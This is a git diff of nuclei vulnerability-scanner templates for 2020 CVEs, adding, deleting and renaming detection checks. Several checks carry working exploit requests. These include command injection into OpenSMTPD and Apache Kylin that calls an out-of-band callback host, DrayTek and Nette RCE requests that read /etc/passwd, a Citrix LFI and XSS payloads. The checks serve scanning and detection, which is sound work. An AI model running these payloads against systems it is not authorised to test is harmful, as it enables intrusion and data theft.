a/nuclei-templates/CVE-2020/CVE-2020-7247.yaml b/nuclei-templates/CVE-2020/CVE-2020-7247.yaml deleted file mode 100644 index 7786b36556..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-7247.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2020-7247 -info: - name: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution - author: princechaddha - severity: critical - reference: https://www.openwall.com/lists/oss-security/2020/01/28/3 - tags: cve,cve2020,smtp,opensmtpd,network,rce,oast - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-7247 - cwe-id: CWE-78,CWE-755 - description: "smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation." -network: - - inputs: - - read: 1024 - - data: "helo target\r\n" - read: 1024 - - data: "MAIL FROM:<;nslookup {{interactsh-url}};>\r\n" - read: 1024 - - data: "RCPT TO:\r\n" - read: 1024 - - data: "DATA\r\n" - read: 1024 - - data: "\r\nxxxx\r\n.\r\n" - read: 1024 - - data: "QUIT\r\n" - read: 1024 - host: - - "{{Hostname}}" - - "{{Host}}:25" - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "dns" - - type: word - part: raw - words: - - "Message accepted for delivery" diff --git a/nuclei-templates/CVE-2020/cve-2020-7796.yaml b/nuclei-templates/CVE-2020/CVE-2020-7796.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-7796.yaml rename to nuclei-templates/CVE-2020/CVE-2020-7796.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7943.yaml b/nuclei-templates/CVE-2020/CVE-2020-7943.yaml deleted file mode 100644 index 1f5454db70..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-7943.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2020-7943 - -info: - name: Puppet Server and PuppetDB sensitive information disclosure - severity: high - author: c-sh0 - description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information - reference: - - https://puppet.com/security/cve/CVE-2020-7943 - - https://nvd.nist.gov/vuln/detail/CVE-2020-7943 - - https://tickets.puppetlabs.com/browse/PDB-4876 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2020-7943 - cwe-id: CWE-276 - tags: cve,cve2020,puppet,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/metrics/v1/mbeans" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - "application/json" - - - type: word - part: body - words: - - "trapperkeeper" diff --git a/nuclei-templates/CVE-2020/CVE-2020-8091.yaml b/nuclei-templates/CVE-2020/CVE-2020-8091.yaml index 1db40c2759..68c9109a22 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-8091.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-8091.yaml @@ -1,4 +1,4 @@ -id: CVE-2020-8091 +id: cve-2020-8091 info: name: TYPO3 Cross-Site Scripting Vulnerability diff --git a/nuclei-templates/CVE-2020/cve-2020-8115.yaml b/nuclei-templates/CVE-2020/CVE-2020-8115.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-8115.yaml rename to nuclei-templates/CVE-2020/CVE-2020-8115.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-8163.yaml b/nuclei-templates/CVE-2020/CVE-2020-8163.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-8163.yaml rename to nuclei-templates/CVE-2020/CVE-2020-8163.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-8193.yaml b/nuclei-templates/CVE-2020/CVE-2020-8193.yaml index 286402bddc..78ea8a7a5d 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-8193.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-8193.yaml @@ -1,20 +1,19 @@ id: CVE-2020-8193 - info: name: Citrix unauthenticated LFI author: pdteam severity: medium + description: Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints. reference: - https://github.com/jas502n/CVE-2020-8193 - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html - description: Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints. - tags: cve,cve2020,citrix,lfi + - https://support.citrix.com/article/CTX276688 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N - cvss-score: 6.50 + cvss-score: 6.5 cve-id: CVE-2020-8193 cwe-id: CWE-862 - + tags: cve,cve2020,citrix,lfi,kev requests: - raw: - | @@ -25,39 +24,33 @@ requests: X-NITRO-PASS: xWXHUJ56 - - | GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 Host: {{Hostname}} - - | GET /menu/neo HTTP/1.1 Host: {{Hostname}} - - | GET /menu/stc HTTP/1.1 Host: {{Hostname}} - - | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml X-NITRO-USER: oY39DXzQ X-NITRO-PASS: ZuU9Y9c1 - rand_key: §randkey§ + rand_key: {{randkey}} - - | POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml X-NITRO-USER: oY39DXzQ X-NITRO-PASS: ZuU9Y9c1 - rand_key: §randkey§ + rand_key: {{randkey}} - cookie-reuse: true extractors: - type: regex @@ -66,9 +59,8 @@ requests: internal: true regex: - "(?m)[0-9]{3,10}\\.[0-9]+" - matchers: - type: regex regex: - "root:.*:0:0:" - part: body \ No newline at end of file + part: body diff --git a/nuclei-templates/CVE-2020/cve-2020-8209.yaml b/nuclei-templates/CVE-2020/CVE-2020-8209.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-8209.yaml rename to nuclei-templates/CVE-2020/CVE-2020-8209.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-8497.yaml b/nuclei-templates/CVE-2020/CVE-2020-8497.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-8497.yaml rename to nuclei-templates/CVE-2020/CVE-2020-8497.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-8512.yaml b/nuclei-templates/CVE-2020/CVE-2020-8512.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-8512.yaml rename to nuclei-templates/CVE-2020/CVE-2020-8512.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-8515.yaml b/nuclei-templates/CVE-2020/CVE-2020-8515.yaml deleted file mode 100644 index c834e6279b..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-8515.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2020-8515 - -info: - name: DrayTek - Remote Code Execution - author: pikpikcu - severity: critical - description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. - reference: - - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) - - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-8515 - - https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html - remediation: This issue has been fixed in Vigor3900/2960/300B v1.5.1. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-8515 - cwe-id: CWE-78 - tags: cve,cve2020,rce,kev - -requests: - - raw: - - | - POST /cgi-bin/mainfunction.cgi HTTP/1.1 - Host: {{Hostname}} - - action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/29 diff --git a/nuclei-templates/CVE-2020/CVE-2020-8615.yaml b/nuclei-templates/CVE-2020/CVE-2020-8615.yaml index acbf4c47d5..573c41bdc3 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-8615.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-8615.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.5 cve-id: CVE-2020-8615 cwe-id: CWE-352 - epss-score: 0.00658 - epss-percentile: 0.77209 + epss-score: 0.00632 + epss-percentile: 0.78607 cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,7 +28,7 @@ info: product: tutor_lms framework: wordpress publicwww-query: /wp-content/plugins/tutor/ - tags: wpscan,packetstorm,cve,cve2023,csrf,wp-plugin,wp,tutor,wordpress + tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum variables: user: "{{rand_base(6)}}" pass: "{{rand_base(8)}}" @@ -58,4 +58,4 @@ http: - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")' - 'status_code_2 == 200' condition: and -# digest: 490a00463044022033fbba9cd2cead4021aae72a7bf1e9fe491ddb5cf0a614409e0870026751c44b02202aa48bbfe3142a6bf781aa1f881a06f68fe6fb76e8a5000c3a9b57cc55ed4a6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100de6de457bb118ab6c4d6b4b82ab6c8ff87768dddd14a369a687a3192e06b4e57022100b77038f1401cb94826ab4e530bebe15addac7087506d0fb7356d04f7c66468f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-8654.yaml b/nuclei-templates/CVE-2020/CVE-2020-8654.yaml index 014f5cb558..83629c7d1c 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-8654.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-8654.yaml @@ -1,27 +1,24 @@ id: CVE-2020-8654 - info: - name: EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution + name: EyesOfNetwork 5.3 - Authenticated RCE author: praetorian-thendrickson severity: high - description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465. + description: EyesOfNetwork version 5.1-5.3 is vulnerable to multiple exploits. Version 5.3 is vulnerable to CVE-2020-8654 (authenticated rce), CVE-2020-8655 (privesc), CVE-2020-8656 (SQLi - API version before 2.4.2), and 2020-8657 (hardcoded api key). Versions 5.1-5.3 are vulnerable to CVE-2020-9465 (SQLi). reference: - https://github.com/h4knet/eonrce - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb + - https://nvd.nist.gov/vuln/detail/CVE-2020-8657 - https://github.com/EyesOfNetworkCommunity/eonweb/issues/50 - - https://nvd.nist.gov/vuln/detail/CVE-2020-8654 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-8654 cwe-id: CWE-78 - tags: cisa,eyesofnetwork,rce,authenticated,msf,cve,cve2020 - + tags: cve,cve2020,cisa,eyesofnetwork,rce,authenticated requests: - method: GET path: - "{{BaseURL}}/css/eonweb.css" - extractors: - type: regex name: version @@ -30,20 +27,15 @@ requests: group: 1 regex: - '# VERSION : ([0-9.]+)' - matchers-condition: and matchers: - type: dsl dsl: - compare_versions(version, '< 5.4', '>= 5.1') - - type: word part: body words: - "EyesOfNetwork" - - type: status status: - 200 - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2020/CVE-2020-8771.yaml b/nuclei-templates/CVE-2020/CVE-2020-8771.yaml deleted file mode 100644 index 192592ff42..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-8771.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2020-8771 -info: - name: WordPress Time Capsule < 1.21.16 - Authentication Bypass - author: princechaddha - severity: critical - description: WordPress Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts. - reference: - - https://github.com/SECFORCE/WPTimeCapsulePOC - - https://nvd.nist.gov/vuln/detail/CVE-2020-8771 - - https://wpvulndb.com/vulnerabilities/10010 - - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-8771 - cwe-id: CWE-287 - tags: cve,cve2020,wordpress,wp-plugin -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: close - Accept: */* - - IWP_JSON_PREFIX - - | - GET /wp-admin/index.php HTTP/1.1 - Host: {{Hostname}} - Connection: close - Accept: */* - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - words: - - '" + condition: or + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-13927.yaml b/nuclei-templates/CVE-2020/cve-2020-13927.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-13927.yaml rename to nuclei-templates/CVE-2020/cve-2020-13927.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-14181.yaml b/nuclei-templates/CVE-2020/cve-2020-14181.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-14181.yaml rename to nuclei-templates/CVE-2020/cve-2020-14181.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-14883.yaml b/nuclei-templates/CVE-2020/cve-2020-14883.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-14883.yaml rename to nuclei-templates/CVE-2020/cve-2020-14883.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-15050.yaml b/nuclei-templates/CVE-2020/cve-2020-15050.yaml index c3a0c4953d..e51ec40239 100644 --- a/nuclei-templates/CVE-2020/cve-2020-15050.yaml +++ b/nuclei-templates/CVE-2020/cve-2020-15050.yaml @@ -1,21 +1,34 @@ id: CVE-2020-15050 info: - name: Suprema BioStar2 - Local File Inclusion (LFI) + name: Suprema BioStar <2.8.2 - Local File Inclusion author: gy741 severity: high - description: An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal. + description: Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. + remediation: | + Upgrade Suprema BioStar to version 2.8.2 or later to fix the LFI vulnerability. reference: - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html - https://www.supremainc.com/en/support/biostar-2-pakage.asp - https://nvd.nist.gov/vuln/detail/CVE-2020-15050 + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.50 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2020-15050 - tags: cve,cve2020,lfi,suprema,biostar2 + cwe-id: CWE-22 + epss-score: 0.55214 + epss-percentile: 0.97597 + cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: supremainc + product: biostar_2 + tags: cve,cve2020,suprema,biostar2,packetstorm,lfi,supremainc -requests: +http: - method: GET path: - "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini" @@ -28,3 +41,4 @@ requests: - "fonts" - "extensions" condition: and +# digest: 490a00463044022027582fd4cb0e0721dcad8ad6dedd262cd3be8b49cf72e43e17a2d9945178024a02205c1ba847b18c648f8f13e7cd4e6e20f76079e24b2801869c1f78c3d40cc310ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-15129.yaml b/nuclei-templates/CVE-2020/cve-2020-15129.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-15129.yaml rename to nuclei-templates/CVE-2020/cve-2020-15129.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-15227.yaml b/nuclei-templates/CVE-2020/cve-2020-15227.yaml new file mode 100644 index 0000000000..e483393043 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-15227.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-15227 + +info: + name: Nette Framework RCE + author: becivells + severity: critical + description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 + - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94 + - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# + - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md + tags: cve,cve2020,nette,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15227 + cwe-id: CWE-74 + +requests: + - method: GET + path: + - "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-15505.yaml b/nuclei-templates/CVE-2020/cve-2020-15505.yaml new file mode 100644 index 0000000000..3672a1f449 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-15505.yaml @@ -0,0 +1,42 @@ +id: CVE-2020-15505 + +info: + name: RCE in MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 + author: dwisiswant0 + severity: critical + description: | + A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier that allows remote attackers to execute arbitrary code via unspecified vectors. + # THIS TEMPLATE IS ONLY FOR DETECTING + # To carry out further attacks, please see reference[2] below. + # This template works by passing a Hessian header, otherwise; + # it will return a 403 or 500 internal server error. Reference[3]. + reference: + - https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html + - https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505 + - https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10 + - https://github.com/orangetw/JNDI-Injection-Bypass + tags: cve,cve2020,mobileiron,rce,sentry + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15505 + +requests: + - raw: + - | + POST /mifs/.;/services/LogService HTTP/1.1 + Host: {{Hostname}} + Referer: https://{{Hostname}} + Content-Type: x-application/hessian + Connection: close + + {{hex_decode('630200480004')}} + matchers-condition: and + matchers: + - type: word + words: + - "application/x-hessian" + part: header + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-15920.yaml b/nuclei-templates/CVE-2020/cve-2020-15920.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-15920.yaml rename to nuclei-templates/CVE-2020/cve-2020-15920.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-16846.yaml b/nuclei-templates/CVE-2020/cve-2020-16846.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-16846.yaml rename to nuclei-templates/CVE-2020/cve-2020-16846.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-18268.yaml b/nuclei-templates/CVE-2020/cve-2020-18268.yaml deleted file mode 100644 index 033c62e51b..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-18268.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2020-18268 - -info: - name: Z-BlogPHP 1.5.2 Open redirect - author: 0x_Akoko - severity: medium - description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php." - reference: - - https://github.com/zblogcn/zblogphp/issues/216 - - https://www.cvedetails.com/cve/CVE-2020-18268 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-18268 - cwe-id: CWE-601 - tags: cve,cve2020,redirect,zblogphp,authenticated - -requests: - - raw: - - | - POST /zb_system/cmd.php?act=verify HTTP/1.1 - Host: {{Hostname}} - Content-Length: 81 - Content-Type: application/x-www-form-urlencoded - Connection: close - - btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0 - - - | - GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2020/cve-2020-19282.yaml b/nuclei-templates/CVE-2020/cve-2020-19282.yaml new file mode 100644 index 0000000000..729970b1ac --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-19282.yaml @@ -0,0 +1,38 @@ +id: CVE-2020-19282 + +info: + name: Jeesns 1.4.2 XSS + author: pikpikcu + severity: medium + description: Reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. + reference: + - https://github.com/zchuanzhao/jeesns/issues/11 + - https://nvd.nist.gov/vuln/detail/CVE-2020-19282 + tags: cve,cve2020,jeesns,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-19282 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2020/CVE-2020-19283.yaml b/nuclei-templates/CVE-2020/cve-2020-19283.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-19283.yaml rename to nuclei-templates/CVE-2020/cve-2020-19283.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-1956.yaml b/nuclei-templates/CVE-2020/cve-2020-1956.yaml new file mode 100644 index 0000000000..55b1c1bc92 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-1956.yaml @@ -0,0 +1,60 @@ +id: CVE-2020-1956 + +info: + name: Apache Kylin 3.0.1 - Command Injection Vulnerability + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution and potential compromise of the affected server. + remediation: | + Upgrade to a patched version of Apache Kylin or apply the necessary security patches provided by the vendor. + reference: + - https://www.sonarsource.com/blog/apache-kylin-command-injection-vulnerability/ + - https://community.sonarsource.com/t/apache-kylin-3-0-1-command-injection-vulnerability/25706 + - https://nvd.nist.gov/vuln/detail/CVE-2020-1956 + - http://www.openwall.com/lists/oss-security/2020/07/14/1 + - https://lists.apache.org/thread.html/r021baf9d8d4ae41e8c8332c167c4fa96c91b5086563d9be55d2d7acf@%3Ccommits.kylin.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-1956 + cwe-id: CWE-78 + epss-score: 0.97374 + epss-percentile: 0.99898 + cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: apache + product: kylin + shodan-query: http.favicon.hash:-186961397 + tags: cve,cve2020,apache,kylin,rce,oast,kev +variables: + username: "{{username}}:" + password: "{{password}}" + +http: + - raw: + - | + POST /kylin/api/user/authentication HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64('{{username}}:' + '{{password}}')}} + - | + POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - http + + - type: word + part: interactsh_request + words: + - "User-Agent: curl" +# digest: 4b0a00483046022100c8831b7a79e58b4e7a67c451f73d3cfb37a6ef3e8e5c080eadc921d72b3f7337022100c542e5c9d7531e4b3e781bbd0655fda3a0f3e96ccce83923abd4935aa15564ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-19625.yaml b/nuclei-templates/CVE-2020/cve-2020-19625.yaml deleted file mode 100644 index 38ef466c86..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-19625.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: cve-2020-19625 -info: - name: Gridx 1.3 RCE - author: geeknik - description: Remote Code Execution vulnerability in tests/support/stores/test_grid_filter.php in oria gridx 1.3, allows remote attackers to execute arbitrary code, via crafted value to the $query parameter. - reference: https://github.com/oria/gridx/issues/433 - severity: high - tags: cve,cve2020,gridx,rce -requests: - - method: GET - path: - - "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "PHP Extension" - - "PHP Version" - condition: and - extractors: - - type: regex - part: body - group: 1 - regex: - - '

PHP Version ([0-9.]+)<\/h1>' diff --git a/nuclei-templates/CVE-2020/cve-2020-20988.yaml b/nuclei-templates/CVE-2020/cve-2020-20988.yaml deleted file mode 100644 index 011eebb4ef..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-20988.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2020-20988 - -info: - name: DomainMOD 4.13.0 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the "or Expiring Between" parameter. - reference: - - https://mycvee.blogspot.com/p/xss2.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-20988 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2020-20988 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2020,domainmod,xss,authenticated - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /reporting/domains/cost-by-owner.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E - - cookie-reuse: true - req-condition: true - host-redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' - - 'contains(body_2, "value=\"\"/>")' - - 'contains(body_2, "DomainMOD")' - condition: and - -# Enhanced by mp on 2022/08/14 diff --git a/nuclei-templates/CVE-2020/cve-2020-2103.yaml b/nuclei-templates/CVE-2020/cve-2020-2103.yaml new file mode 100644 index 0000000000..5adba642ed --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-2103.yaml @@ -0,0 +1,67 @@ +id: CVE-2020-2103 + +info: + name: Jenkins <=2.218 - Information Disclosure + author: c-sh0 + severity: medium + description: Jenkins through 2.218, LTS 2.204.1 and earlier, is susceptible to information disclosure. An attacker can access exposed session identifiers on a user detail object in the whoAmI diagnostic 